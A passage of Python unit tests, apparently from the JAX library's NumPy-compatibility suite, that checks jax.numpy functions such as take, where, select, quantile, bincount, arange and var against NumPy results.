    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_index={}_axis={}_mode={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          jtu.format_shape_dtype_string(index_shape, index_dtype),
          axis, mode),
       "shape": shape, "index_shape": index_shape, "dtype": dtype,
       "index_dtype": index_dtype, "axis": axis, "mode": mode}
      for shape in [(3,), (3, 4), (3, 4, 5)]
      for index_shape in scalar_shapes + [(3,), (2, 1, 3)]
      for axis in itertools.chain(range(-len(shape), len(shape)),
                                  [cast(Optional[int], None)])
      for dtype in all_dtypes
      for index_dtype in int_dtypes
      for mode in [None, 'wrap', 'clip']))
  def testTake(self, shape, dtype, index_shape, index_dtype, axis, mode):
    """jnp.take matches np.take for all index modes (None/'wrap'/'clip')."""
    def args_maker():
      # Closes over rng/rng_indices bound below; legal since it is only
      # called after they are defined.
      x = rng(shape, dtype)
      i = rng_indices(index_shape, index_dtype)
      return x, i

    rng = jtu.rand_default(self.rng())
    if mode is None:
      # Default mode: indices must be in bounds for the selected axis
      # (axis=None flattens, so axis 0's extent is used as a stand-in).
      rng_indices = jtu.rand_int(self.rng(), -shape[axis or 0], shape[axis or 0])
    else:
      # wrap/clip modes tolerate out-of-range indices, so sample freely.
      rng_indices = jtu.rand_int(self.rng(), -5, 5)
    jnp_op = lambda x, i: jnp.take(x, i, axis=axis, mode=mode)
    np_op = lambda x, i: np.take(x, i, axis=axis, mode=mode)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
def testTakeEmpty(self):
np.testing.assert_array_equal(
jnp.array([], dtype=jnp.float32),
jnp.take(jnp.array([], jnp.float32), jnp.array([], jnp.int32)))
np.testing.assert_array_equal(
jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32), jnp.array([], jnp.int32),
axis=1))
with self.assertRaisesRegex(IndexError, "non-empty jnp.take"):
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.array([0], jnp.int32), axis=1)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_index={}_axis={}".format(
          jtu.format_shape_dtype_string(x_shape, dtype),
          jtu.format_shape_dtype_string(i_shape, index_dtype), axis),
       "x_shape": x_shape, "i_shape": i_shape, "dtype": dtype,
       "index_dtype": index_dtype, "axis": axis}
      for x_shape, i_shape in filter(
        _shapes_are_equal_length,
        filter(_shapes_are_broadcast_compatible,
               itertools.combinations_with_replacement(nonempty_nonscalar_array_shapes, 2)))
      for axis in itertools.chain(range(len(x_shape)), [-1],
                                  [cast(Optional[int], None)])
      for dtype in default_dtypes
      for index_dtype in int_dtypes))
  def testTakeAlongAxis(self, x_shape, i_shape, dtype, index_dtype, axis):
    """jnp.take_along_axis matches np.take_along_axis, including broadcasting
    of the index array and signed/unsigned index dtypes."""
    rng = jtu.rand_default(self.rng())
    i_shape = np.array(i_shape)
    if axis is None:
      # axis=None operates on the flattened array, so indices are 1D.
      i_shape = [np.prod(i_shape, dtype=np.int64)]
    else:
      # Test the case where the size of the axis doesn't necessarily broadcast.
      i_shape[axis] *= 3
      i_shape = list(i_shape)
    def args_maker():
      x = rng(x_shape, dtype)
      n = np.prod(x_shape, dtype=np.int32) if axis is None else x_shape[axis]
      if np.issubdtype(index_dtype, np.unsignedinteger):
        # Unsigned index dtypes cannot represent negative indices.
        index_rng = jtu.rand_int(self.rng(), 0, n)
      else:
        index_rng = jtu.rand_int(self.rng(), -n, n)
      i = index_rng(i_shape, index_dtype)
      return x, i
    jnp_op = lambda x, i: jnp.take_along_axis(x, i, axis=axis)

    # np.take_along_axis was added in NumPy 1.15; skip the comparison when
    # running against an older NumPy, but still compile-check jnp's version.
    if hasattr(np, "take_along_axis"):
      np_op = lambda x, i: np.take_along_axis(x, i, axis=axis)
      self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
def testTakeAlongAxisWithUint8IndicesDoesNotOverflow(self):
# https://github.com/google/jax/issues/5088
h = jtu.rand_default(self.rng())((256, 256, 100), np.float32)
g = jtu.rand_int(self.rng(), 0, 100)((256, 256, 1), np.uint8)
q0 = jnp.take_along_axis(h, g, axis=-1)
q1 = np.take_along_axis( h, g, axis=-1)
np.testing.assert_equal(q0, q1)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_n={}_increasing={}".format(
          jtu.format_shape_dtype_string([shape], dtype),
          n, increasing),
       "dtype": dtype, "shape": shape, "n": n, "increasing": increasing}
      for dtype in inexact_dtypes
      for shape in [0, 5]
      for n in [2, 4]
      for increasing in [False, True]))
  def testVander(self, shape, dtype, n, increasing):
    """jnp.vander matches np.vander, including empty input and both column orders."""
    rng = jtu.rand_default(self.rng())
    def np_fun(arg):
      # np.vander has no bfloat16 support; compute the reference in float32.
      arg = arg.astype(np.float32) if dtype == jnp.bfloat16 else arg
      return np.vander(arg, N=n, increasing=increasing)
    jnp_fun = lambda arg: jnp.vander(arg, N=n, increasing=increasing)
    args_maker = lambda: [rng([shape], dtype)]
    # np.vander seems to return float64 for all floating types. We could obey
    # those semantics, but they seem like a bug.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol={np.float32: 1e-3})
    self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix(
          "nan_to_num", [shape], [dtype]),
       "shape": shape, "dtype": dtype}
      for shape in array_shapes
      for dtype in inexact_dtypes))
  def testNanToNum(self, shape, dtype):
    """jnp.nan_to_num matches np.nan_to_num on arrays containing inf/nan."""
    rng = jtu.rand_some_inf_and_nan(self.rng())
    dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
    def np_fun(x):
      if dtype == jnp.bfloat16:
        # np.nan_to_num has no bfloat16 support; replicate its substitutions
        # (nan -> 0, +/-inf -> finfo max/min) manually for the reference.
        x = np.where(np.isnan(x), dtype(0), x)
        x = np.where(np.isposinf(x), jnp.finfo(dtype).max, x)
        x = np.where(np.isneginf(x), jnp.finfo(dtype).min, x)
        return x
      else:
        return np.nan_to_num(x).astype(dtype)
    args_maker = lambda: [rng(shape, dtype)]
    # Python scalar inputs legitimately differ in result dtype.
    check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
    self._CheckAgainstNumpy(np_fun, jnp.nan_to_num, args_maker,
                            check_dtypes=check_dtypes)
    self._CompileAndCheck(jnp.nan_to_num, args_maker,
                          check_dtypes=check_dtypes)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("ix_", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes, dtypes in (
        ((), ()),
        (((7,),), (np.int32,)),
        (((3,), (4,)), (np.int32, np.int32)),
        (((3,), (1,), (4,)), (np.int32, np.int32, np.int32)),
      )))
  def testIx_(self, shapes, dtypes):
    """jnp.ix_ matches np.ix_ for zero to three 1D index sequences."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype)
                          for shape, dtype in zip(shapes, dtypes)]
    self._CheckAgainstNumpy(np.ix_, jnp.ix_, args_maker)
    self._CompileAndCheck(jnp.ix_, args_maker)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_dimensions={}_dtype={}_sparse={}".format(
            dimensions, dtype, sparse),
         "dimensions": dimensions, "dtype": dtype, "sparse": sparse}
        for dimensions in [(), (2,), (3, 0), (4, 5, 6)]
        for dtype in number_dtypes
        for sparse in [True, False]))
  def testIndices(self, dimensions, dtype, sparse):
    """jnp.indices matches np.indices (dense and sparse), incl. empty dims."""
    # All inputs are baked into the partials, so args_maker is empty.
    def args_maker(): return []
    np_fun = partial(np.indices, dimensions=dimensions,
                     dtype=dtype, sparse=sparse)
    jnp_fun = partial(jnp.indices, dimensions=dimensions,
                      dtype=dtype, sparse=sparse)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
"_op={}_a_shape={}_q_shape={}_axis={}_keepdims={}_interpolation={}".format(
op,
jtu.format_shape_dtype_string(a_shape, a_dtype),
jtu.format_shape_dtype_string(q_shape, q_dtype),
axis, keepdims, interpolation),
"a_rng": jtu.rand_some_nan,
"q_rng": q_rng, "op": op,
"a_shape": a_shape, "a_dtype": a_dtype,
"q_shape": q_shape, "q_dtype": q_dtype, "axis": axis,
"keepdims": keepdims,
"interpolation": interpolation}
for (op, q_rng) in (
("percentile", partial(jtu.rand_uniform, low=0., high=100.)),
("quantile", partial(jtu.rand_uniform, low=0., high=1.)),
("nanpercentile", partial(jtu.rand_uniform, low=0., high=100.)),
("nanquantile", partial(jtu.rand_uniform, low=0., high=1.)),
)
for a_dtype in default_dtypes
for a_shape, axis in (
((7,), None),
((47, 7), 0),
((4, 101), 1),
)
for q_dtype in [np.float32]
for q_shape in scalar_shapes + [(4,)]
for keepdims in [False, True]
for interpolation in ['linear', 'lower', 'higher', 'nearest',
'midpoint']))
def testQuantile(self, op, a_rng, q_rng, a_shape, a_dtype, q_shape, q_dtype,
axis, keepdims, interpolation):
a_rng = a_rng(self.rng())
q_rng = q_rng(self.rng())
if "median" in op:
args_maker = lambda: [a_rng(a_shape, a_dtype)]
else:
args_maker = lambda: [a_rng(a_shape, a_dtype), q_rng(q_shape, q_dtype)]
def np_fun(*args):
args = [x if jnp.result_type(x) != jnp.bfloat16 else
np.asarray(x, np.float32) for x in args]
return getattr(np, op)(*args, axis=axis, keepdims=keepdims,
interpolation=interpolation)
jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims,
interpolation=interpolation)
# TODO(phawkins): we currently set dtype=False because we aren't as
# aggressive about promoting to float64. It's not clear we want to mimic
# Numpy here.
tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
tol = max(jtu.tolerance(a_dtype, tol_spec),
jtu.tolerance(q_dtype, tol_spec))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name":
       "_{}_a_shape={}_axis={}_keepdims={}".format(
         op, jtu.format_shape_dtype_string(a_shape, a_dtype),
         axis, keepdims),
       "op": op, "a_shape": a_shape, "a_dtype": a_dtype,
       "axis": axis,
       "keepdims": keepdims}
      for a_dtype in default_dtypes
      for a_shape, axis in (
        ((7,), None),
        ((47, 7), 0),
        ((4, 101), 1),
      )
      for keepdims in [False, True]
      for op in ["median", "nanmedian"]))
  def testMedian(self, op, a_shape, a_dtype, axis, keepdims):
    """jnp.median and jnp.nanmedian match their NumPy counterparts."""
    if op == "median":
      a_rng = jtu.rand_default(self.rng())
    else:
      # Only the nan-aware op gets NaN inputs; plain median would just
      # propagate them and weaken the comparison.
      a_rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: [a_rng(a_shape, a_dtype)]
    def np_fun(*args):
      # np has no bfloat16 support; compute the reference in float32.
      args = [x if jnp.result_type(x) != jnp.bfloat16 else
              np.asarray(x, np.float32) for x in args]
      return getattr(np, op)(*args, axis=axis, keepdims=keepdims)
    jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims)
    # TODO(phawkins): we currently set dtype=False because we aren't as
    # aggressive about promoting to float64. It's not clear we want to mimic
    # Numpy here.
    tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
    tol = jtu.tolerance(a_dtype, tol_spec)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}".format(
          jtu.format_shape_dtype_string(shape, dtype)),
       "shape": shape, "dtype": dtype}
      for shape in all_shapes for dtype in all_dtypes))
  def testWhereOneArgument(self, shape, dtype):
    """One-argument jnp.where (nonzero-style) matches np.where."""
    rng = jtu.rand_some_zero(self.rng())
    np_fun = lambda x: np.where(x)
    # NumPy warns (DeprecationWarning) for nonzero on 0d arrays; silence it
    # so scalar-shaped cases still compare cleanly.
    np_fun = jtu.ignore_warning(
        category=DeprecationWarning,
        message="Calling nonzero on 0d arrays.*")(np_fun)
    jnp_fun = lambda x: jnp.where(x)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)

    # JIT compilation requires specifying a size statically. Full test of
    # this behavior is in testNonzeroSize().
    jnp_fun = lambda x: jnp.where(x, size=np.size(x) // 2)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
        "testcase_name": "_{}".format("_".join(
          jtu.format_shape_dtype_string(shape, dtype)
          for shape, dtype in zip(shapes, dtypes))),
        "shapes": shapes, "dtypes": dtypes
      } for shapes in s(filter(_shapes_are_broadcast_compatible,
                               itertools.combinations_with_replacement(all_shapes, 3)))
        for dtypes in s(itertools.combinations_with_replacement(all_dtypes, 3)))))
  def testWhereThreeArgument(self, shapes, dtypes):
    """Three-argument jnp.where matches np.where over broadcastable shapes."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes)
    def np_fun(cond, x, y):
      # Apply jnp's promotion rules to the branches before calling np.where.
      return _promote_like_jnp(partial(np.where, cond))(x, y)
    self._CheckAgainstNumpy(np_fun, jnp.where, args_maker)
    self._CompileAndCheck(jnp.where, args_maker)
def testWhereScalarPromotion(self):
x = jnp.where(jnp.array([True, False]), 3,
jnp.ones((2,), dtype=jnp.float32))
self.assertEqual(x.dtype, np.dtype(np.float32))
  @parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
        "testcase_name": jtu.format_test_name_suffix("", shapes, (np.bool_,) * n + dtypes),
        "shapes": shapes, "dtypes": dtypes
      } for n in s(range(1, 3))
        for shapes in s(filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(all_shapes, 2 * n + 1)))
        for dtypes in s(itertools.combinations_with_replacement(all_dtypes, n + 1)))))
  def testSelect(self, shapes, dtypes):
    """jnp.select matches np.select for n conditions, n choices, and a default."""
    rng = jtu.rand_default(self.rng())
    # shapes holds 2n+1 entries: n condition shapes, n choice shapes, and
    # the default's shape; dtypes holds n choice dtypes plus the default's.
    n = len(dtypes) - 1
    def args_maker():
      condlist = [rng(shape, np.bool_) for shape in shapes[:n]]
      choicelist = [rng(shape, dtype)
                    for shape, dtype in zip(shapes[n:-1], dtypes[:n])]
      default = rng(shapes[-1], dtypes[-1])
      return condlist, choicelist, default
    # TODO(phawkins): float32/float64 type mismatches
    def np_fun(condlist, choicelist, default):
      # Cast everything to jnp's result type first (and work around np's
      # missing bfloat16 support) so only values are compared below.
      choicelist = [x if jnp.result_type(x) != jnp.bfloat16
                    else x.astype(np.float32) for x in choicelist]
      dtype = jnp.result_type(default, *choicelist)
      return np.select(condlist,
                        [np.asarray(x, dtype=dtype) for x in choicelist],
                        np.asarray(default, dtype=dtype))
    self._CheckAgainstNumpy(np_fun, jnp.select, args_maker,
                            check_dtypes=False)
    self._CompileAndCheck(jnp.select, args_maker,
                          rtol={np.float64: 1e-7, np.complex128: 1e-7})
def testIssue330(self):
x = jnp.full((1, 1), jnp.array([1])[0]) # doesn't crash
self.assertEqual(x[0, 0], 1)
def testScalarDtypePromotion(self):
orig_numpy_result = (1 + np.eye(1, dtype=np.float32)).dtype
jax_numpy_result = (1 + jnp.eye(1, dtype=jnp.float32)).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
def testSymmetrizeDtypePromotion(self):
x = np.eye(3, dtype=np.float32)
orig_numpy_result = ((x + x.T) / 2).dtype
x = jnp.eye(3, dtype=jnp.float32)
jax_numpy_result = ((x + x.T) / 2).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because
# introducing the convention 0 * inf = 0 leads to silently wrong results in
# some cases. See this comment for details:
# https://github.com/google/jax/issues/1052#issuecomment-514083352
# def testIssue347(self):
# # https://github.com/google/jax/issues/347
# def test_fail(x):
# x = jnp.sqrt(jnp.sum(x ** 2, axis=1))
# ones = jnp.ones_like(x)
# x = jnp.where(x > 0.5, x, ones)
# return jnp.sum(x)
# x = jnp.array([[1, 2], [3, 4], [0, 0]], dtype=jnp.float64)
# result = api.grad(test_fail)(x)
# assert not np.any(np.isnan(result))
def testIssue453(self):
# https://github.com/google/jax/issues/453
a = np.arange(6) + 1
ans = jnp.reshape(a, (3, 2), order='F')
expected = np.reshape(a, (3, 2), order='F')
self.assertAllClose(ans, expected)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_op={}_dtype={}".format(op, pytype.__name__),
       "pytype": pytype, "dtype": dtype, "op": op}
      for pytype, dtype in [(int, jnp.int_), (float, jnp.float_),
                            (bool, jnp.bool_), (complex, jnp.complex_)]
      for op in ["atleast_1d", "atleast_2d", "atleast_3d"]))
  def testAtLeastNdLiterals(self, pytype, dtype, op):
    """jnp.atleast_{1,2,3}d accept bare Python scalars (issue #634)."""
    # Fixes: https://github.com/google/jax/issues/634
    # Cast the NumPy reference to jnp's canonical dtype for the scalar type.
    np_fun = lambda arg: getattr(np, op)(arg).astype(dtype)
    jnp_fun = lambda arg: getattr(jnp, op)(arg)
    args_maker = lambda: [pytype(2)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {
        "testcase_name": "_shape={}_dtype={}_weights={}_minlength={}_length={}".format(
          shape, dtype, weights, minlength, length
        ),
        "shape": shape,
        "dtype": dtype,
        "weights": weights,
        "minlength": minlength,
        "length": length}
      for shape in [(0,), (5,), (10,)]
      for dtype in int_dtypes
      for weights in [True, False]
      for minlength in [0, 20]
      for length in [None, 10]
  ))
  def testBincount(self, shape, dtype, weights, minlength, length):
    """jnp.bincount matches np.bincount; jnp's static `length` enables jit."""
    rng = jtu.rand_positive(self.rng())
    args_maker = lambda: (rng(shape, dtype), (rng(shape, 'float32') if weights else None))

    # np.bincount has no `length` parameter (it is a jnp extension that
    # fixes the output size so the op can be jitted).
    np_fun = partial(np.bincount, minlength=minlength)
    jnp_fun = partial(jnp.bincount, minlength=minlength, length=length)

    if length is not None:
      # With a static length the op is jit-compatible; only compile-check,
      # since the truncated output need not match np.bincount.
      self._CompileAndCheck(jnp_fun, args_maker)
    if length is None:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
def testBincountNegative(self):
# Test that jnp.bincount ignores negative values.
x_rng = jtu.rand_int(self.rng(), -100, 100)
w_rng = jtu.rand_uniform(self.rng())
shape = (1000,)
x = x_rng(shape, 'int32')
w = w_rng(shape, 'float32')
xn = np.array(x)
xn[xn < 0] = 0
wn = np.array(w)
np_result = np.bincount(xn[xn >= 0], wn[xn >= 0])
jnp_result = jnp.bincount(x, w)
self.assertAllClose(np_result, jnp_result, check_dtypes=False)
  @parameterized.named_parameters(*jtu.cases_from_list(
      {"testcase_name": "_case={}".format(i),
       "input": input}
       for i, input in enumerate([
         3,
         [3],
         [np.array(3)],
         [np.array([3])],
         [[np.array(3)]],
         [[np.array([3])]],
         [3, 4, 5],
         [
           [np.eye(2, dtype=np.int32) * 2, np.zeros((2, 3), dtype=np.int32)],
           [np.ones((3, 2), dtype=np.int32), np.eye(3, dtype=np.int32) * 3],
         ],
         [np.array([1, 2, 3]), np.array([2, 3, 4]), 10],
         [np.ones((2, 2), dtype=np.int32), np.zeros((2, 2), dtype=np.int32)],
         [[np.array([1, 2, 3])], [np.array([2, 3, 4])]],
       ])))
  def testBlock(self, input):
    """jnp.block matches np.block for scalars, nested lists, and mixed cases."""
    args_maker = lambda: [input]
    self._CheckAgainstNumpy(np.block, jnp.block, args_maker)
    self._CompileAndCheck(jnp.block, args_maker)
def testLongLong(self):
self.assertAllClose(np.int64(7), api.jit(lambda x: x)(np.longlong(7)))
  @jtu.ignore_warning(category=UserWarning,
                      message="Explicitly requested dtype.*")
  def testArange(self):
    """jnp.arange matches np.arange for int/float args, explicit dtypes,
    and negative steps — and stays lazy (an iota, not a materialized array)."""
    # test cases inspired by dask tests at
    # https://github.com/dask/dask/blob/main/dask/array/tests/test_creation.py#L92
    self.assertAllClose(jnp.arange(77),
                        np.arange(77, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(2, 13),
                        np.arange(2, 13, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(4, 21, 9),
                        np.arange(4, 21, 9, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(53, 5, -3),
                        np.arange(53, 5, -3, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(77, dtype=float),
                        np.arange(77, dtype=float))
    self.assertAllClose(jnp.arange(2, 13, dtype=int),
                        np.arange(2, 13, dtype=int))
    # Negative step past the stop yields an empty range in both libraries.
    self.assertAllClose(jnp.arange(0, 1, -0.5),
                        np.arange(0, 1, -0.5, dtype=jnp.float_))

    self.assertRaises(TypeError, lambda: jnp.arange())

    # test that jnp.arange(N) doesn't instantiate an ndarray
    self.assertNotEqual(type(jnp.arange(77)), type(np.arange(77)))
    self.assertEqual(type(jnp.arange(77)), type(lax.iota(np.int32, 77)))

    # test that jnp.arange(N, dtype=int32) doesn't instantiate an ndarray
    self.assertNotEqual(type(jnp.arange(77, dtype=jnp.int32)),
                        type(np.arange(77, dtype=np.int32)))
    self.assertEqual(type(jnp.arange(77, dtype=jnp.int32)),
                     type(lax.iota(np.int32, 77)))
def testArangeJit(self):
ans = api.jit(lambda: jnp.arange(5))()
expected = np.arange(5)
self.assertAllClose(ans, expected)
def testIssue830(self):
a = jnp.arange(4, dtype=jnp.complex64)
self.assertEqual(a.dtype, jnp.complex64)
def testIssue728(self):
assert jnp.allclose(jnp.eye(5000), np.eye(5000))
self.assertEqual(0, np.sum(jnp.eye(1050) - np.eye(1050)))
def testIssue746(self):
jnp.arange(12).reshape(3, 4) # doesn't crash
def testIssue764(self):
x = jnp.linspace(190, 200, 4)
f = api.grad(lambda x: jnp.sum(jnp.tanh(x)))
# Expected values computed with autograd in float64 precision.
expected = np.array([3.71669453e-165, 4.72999108e-168, 6.01954653e-171,
7.66067839e-174], np.float64)
self.assertAllClose(f(x), expected, check_dtypes=False)
  def testIssue776(self):
    """Tests that the scatter-add transpose rule instantiates symbolic zeros."""
    def f(u):
      y = jnp.ones(10).at[np.array([2, 4, 5])].add(u)
      # The transpose rule for lax.tie_in returns a symbolic zero for its first
      # argument.
      return lax.tie_in(y, 7.)

    # The output is the constant 7., so the gradient w.r.t. u must be zero —
    # but computing it forces the scatter-add transpose path being tested.
    self.assertAllClose(np.zeros(3,), api.grad(f)(np.ones(3,)))
  # NOTE(mattjj): I disabled this test when removing lax._safe_mul because this
  # is a numerical stability issue that should be solved with a custom jvp rule
  # of the sigmoid function being differentiated here, not by safe_mul.
  # def testIssue777(self):
  #   x = jnp.linspace(-200, 0, 4, dtype=np.float32)
  #   f = api.grad(lambda x: jnp.sum(1 / (1 + jnp.exp(-x))))
  #   self.assertAllClose(f(x), np.array([0., 0., 0., 0.25], dtype=np.float32))

  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(op, [()], [dtype]),
         "dtype": dtype, "op": op}
        for dtype in float_dtypes
        for op in ("sqrt", "arccos", "arcsin", "arctan", "sin", "cos", "tan",
                   "sinh", "cosh", "tanh", "arccosh", "arcsinh", "arctanh", "exp",
                   "log", "expm1", "log1p")))
  def testMathSpecialFloatValues(self, op, dtype):
    """Elementwise math ops agree with NumPy at special values
    (nan, +/-inf, zeros, dtype extremes), including out-of-domain inputs."""
    np_op = getattr(np, op)
    # The NumPy reference legitimately warns at many of these inputs
    # (domain errors, overflow); silence all three warning classes.
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="invalid value.*")(np_op)
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="divide by zero.*")(np_op)
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="overflow.*")(np_op)

    jnp_op = getattr(jnp, op)
    dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
    for x in (np.nan, -np.inf, -100., -2., -1., 0., 1., 2., 100., np.inf,
              jnp.finfo(dtype).max, np.sqrt(jnp.finfo(dtype).max),
              np.sqrt(jnp.finfo(dtype).max) * 2.):
      if (op in ("sin", "cos", "tan") and
          jtu.device_under_test() == "tpu"):
        continue  # TODO(b/132196789): fix and reenable.
      x = dtype(x)
      expected = np_op(x)
      actual = jnp_op(x)
      tol = jtu.tolerance(dtype, {np.float32: 1e-3, np.float64: 1e-7})
      self.assertAllClose(expected, actual, atol=tol,
                          rtol=tol)
  def testIssue883(self):
    """Disabled regression test for jitting with array-valued static args.

    The code after the raise is intentionally unreachable: it is kept as a
    record of the original repro from issue #883, now disallowed by policy.
    """
    # from https://github.com/google/jax/issues/883
    raise SkipTest("we decided to disallow arrays as static args")

    @partial(api.jit, static_argnums=(1,))
    def f(x, v):
      return x

    x = jnp.ones((10, 10))
    v = jnp.array([1, 2, 3])
    _ = f(x, v)
    _ = f(x, v)  # doesn't crash
def testReductionOfOutOfBoundsAxis(self): # Issue 888
x = jnp.ones((3, 4))
self.assertRaises(ValueError, lambda: jnp.sum(x, axis=2))
def testIssue956(self):
self.assertRaises(TypeError, lambda: jnp.ndarray((1, 1)))
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
          .format(shape, dtype, out_dtype, axis, ddof, keepdims),
         "shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
         "ddof": ddof, "keepdims": keepdims}
        for shape in [(5,), (10, 5)]
        for dtype in all_dtypes
        for out_dtype in inexact_dtypes
        for axis in [None, 0, -1]
        for ddof in [0, 1, 2]
        for keepdims in [False, True]))
  def testVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
    """jnp.var matches np.var for all axes/ddof/keepdims and output dtypes;
    complex input with a real output dtype must raise ValueError."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.")
    def np_fun(x):
      # Accumulate in at least float32 (matching jnp's promotion), then
      # cast to the requested output dtype for comparison.
      out = np.var(x.astype(jnp.promote_types(np.float32, dtype)),
                   axis=axis, ddof=ddof, keepdims=keepdims)
      return out.astype(out_dtype)
    jnp_fun = partial(jnp.var, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
    tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
                                    np.float64: 1e-3, np.complex128: 1e-6})
    if (jnp.issubdtype(dtype, jnp.complexfloating) and
        not jnp.issubdtype(out_dtype, jnp.complexfloating)):
      self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
    else:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                              tol=tol)
      self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
                            atol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
          .format(shape, dtype, out_dtype, axis, ddof, keepdims),
         "shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
         "ddof": ddof, "keepdims": keepdims}
        for shape in [(5,), (10, 5)]
        for dtype in all_dtypes
        for out_dtype in inexact_dtypes
        for axis in [None, 0, -1]
        for ddof in [0, 1, 2]
        for keepdims in [False, True]))
  def testNanVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
    """jnp.nanvar matches np.nanvar on NaN-containing input for all
    axes/ddof/keepdims; complex-to-real output dtype must raise ValueError."""
    rng = jtu.rand_some_nan(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.")
    def np_fun(x):
      # Accumulate in at least float32 (matching jnp's promotion), then
      # cast to the requested output dtype for comparison.
      out = np.nanvar(x.astype(jnp.promote_types(np.float32, dtype)),
                      axis=axis, ddof=ddof, keepdims=keepdims)
      return out.astype(out_dtype)
    jnp_fun = partial(jnp.nanvar, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
    tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
                                    np.float64: 1e-3, np.complex128: 1e-6})
    if (jnp.issubdtype(dtype, jnp.complexfloating) and
        not jnp.issubdtype(out_dtype, jnp.complexfloating)):
      self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
    else:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                              tol=tol)
      self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
                            atol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_y_shape={}_y_dtype={}_rowvar={}_ddof={}_bias={}_fweights={}_aweights={}".format(
            shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights),
         "shape": shape, "y_shape": y_shape, "dtype": dtype, "y_dtype": y_dtype,"rowvar": rowvar, "ddof": ddof,
